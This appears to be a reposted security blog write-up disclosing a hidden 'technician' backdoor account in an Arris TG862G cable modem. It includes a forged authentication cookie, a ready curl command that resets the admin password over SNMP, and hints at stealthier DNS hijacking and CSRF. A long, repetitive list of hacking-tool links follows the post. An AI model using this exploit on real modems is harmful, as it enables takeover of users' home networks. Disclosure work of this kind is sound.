lørdag, januar 20, 2024

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(




That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:


That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:


Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....



That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:


This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Related posts


  1. Hacker Techniques Tools And Incident Handling
  2. Hack Tools For Mac
  3. Pentest Automation Tools
  4. Hacking Tools 2019
  5. Pentest Tools Port Scanner
  6. Wifi Hacker Tools For Windows
  7. Pentest Tools Find Subdomains
  8. Pentest Tools Find Subdomains
  9. How To Make Hacking Tools
  10. Physical Pentest Tools
  11. Pentest Reporting Tools
  12. Pentest Tools Find Subdomains
  13. Hack Tools 2019
  14. Top Pentest Tools
  15. Hacking Tools For Windows Free Download
  16. Pentest Box Tools Download
  17. Hacker Tools Hardware
  18. Blackhat Hacker Tools
  19. Pentest Tools Android
  20. New Hacker Tools
  21. Pentest Tools For Mac
  22. Pentest Reporting Tools
  23. Pentest Tools Download
  24. Hack Tools Online
  25. Pentest Tools Github
  26. Github Hacking Tools
  27. Hacking Apps
  28. Hacking Tools Online
  29. Blackhat Hacker Tools
  30. Hacker Tool Kit
  31. Pentest Tools Open Source
  32. Hacker Security Tools
  33. Kik Hack Tools
  34. Best Pentesting Tools 2018
  35. Hack Tool Apk No Root
  36. Hacking Tools Hardware
  37. Hacker Tools List
  38. Hacker
  39. Hacking Tools 2020
  40. Hacking Tools And Software
  41. Pentest Reporting Tools
  42. Hacking Tools For Pc
  43. Pentest Tools Android
  44. Hack Tools
  45. Hacker Tools For Windows
  46. Hacking Tools Mac
  47. Hacking Tools Windows
  48. Pentest Tools Framework
  49. Tools For Hacker
  50. Hacking Tools Github
  51. Hacking Tools Software
  52. Hacker Tools Linux
  53. Pentest Tools Alternative
  54. Pentest Tools Online
  55. Free Pentest Tools For Windows
  56. What Are Hacking Tools
  57. Hacks And Tools
  58. Hacking Tools Mac
  59. Hacking Tools Download
  60. Easy Hack Tools
  61. Pentest Tools Kali Linux
  62. Hack And Tools
  63. Pentest Tools Github
  64. Pentest Tools Port Scanner
  65. Pentest Box Tools Download
  66. Hack Tool Apk
  67. Hacking Tools And Software
  68. Hacking Tools For Games
  69. Hacker Tools
  70. Hacking Tools For Windows
  71. Pentest Tools For Android
  72. Usb Pentest Tools
  73. Nsa Hack Tools
  74. Hack Rom Tools
  75. Bluetooth Hacking Tools Kali
  76. Hacker Tools Free Download
  77. Hack Tools For Ubuntu
  78. Hacking Apps
  79. Hacking Tools For Windows
  80. Hacker Tools Apk
  81. Pentest Tools Windows
  82. Pentest Tools Apk
  83. Pentest Tools Find Subdomains
  84. Bluetooth Hacking Tools Kali
  85. Hacker Tools List
  86. Hack And Tools
  87. Hacker Techniques Tools And Incident Handling
  88. Hacker Tools Hardware
  89. Hackrf Tools
  90. How To Make Hacking Tools
  91. Install Pentest Tools Ubuntu
  92. Hacking Tools For Windows
  93. Hack Tools Pc
  94. Pentest Tools Website Vulnerability
  95. Hackrf Tools
  96. Hacking Tools And Software
  97. World No 1 Hacker Software
  98. World No 1 Hacker Software
  99. How To Hack
  100. Hack Tools Github
  101. What Is Hacking Tools
  102. Hacker Tools Mac
  103. Hackrf Tools
  104. Pentest Tools Linux
  105. Pentest Tools For Android
  106. Pentest Tools Port Scanner
  107. Hack Tools For Pc
  108. Pentest Tools Review
  109. Pentest Tools Github
  110. Hacking Tools Windows
  111. Nsa Hack Tools Download
  112. Hacking Tools For Kali Linux
Lagt inn av kl.

Ingen kommentarer:

Legg inn en kommentar

Abonner på: Legg inn kommentarer (Atom)